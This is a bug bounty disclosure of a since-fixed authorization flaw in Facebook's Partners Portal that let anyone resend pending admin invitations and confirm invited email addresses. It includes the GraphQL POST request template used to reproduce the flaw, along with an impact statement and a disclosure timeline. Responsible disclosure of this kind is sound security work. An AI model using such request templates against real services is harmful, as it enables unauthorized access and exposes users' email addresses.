Description
This bug could allow an attacker to resend invitation email to a user added by admins in Partners Portal. This could be used to confirm if an admin has sent an invitation to a specific email address or user, and if so you can resend the email with the invitation link without having the permission to the Partner account.
Reproduction Steps
Using the attacker account:
1) Send a POST request to https://www.facebook.com/api/graphql/ with valid cookies and those parameters in the body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=2757598104258915&
variables={“partner_id”:XXXXXXX,”portal_type”:”fbs”,”email”:”YYYYYYY“}
where XXXXXXX is the partner_id of the target partner account, and YYYYYYY is the pending email, fbs represents the portal type of the Partner account
Impact
This could be used to determine admin email addresses added to the Partners portal account and resend a new invitations to those email addresses without having permission or access to the account.
Timeline
Feb 5, 2020— Report Sent
Feb 20, 2020— Acknowledged by Facebook
Mar 10, 2020— Fixed by Facebook
Mar 12, 2020 — $500 bounty awarded by Facebook.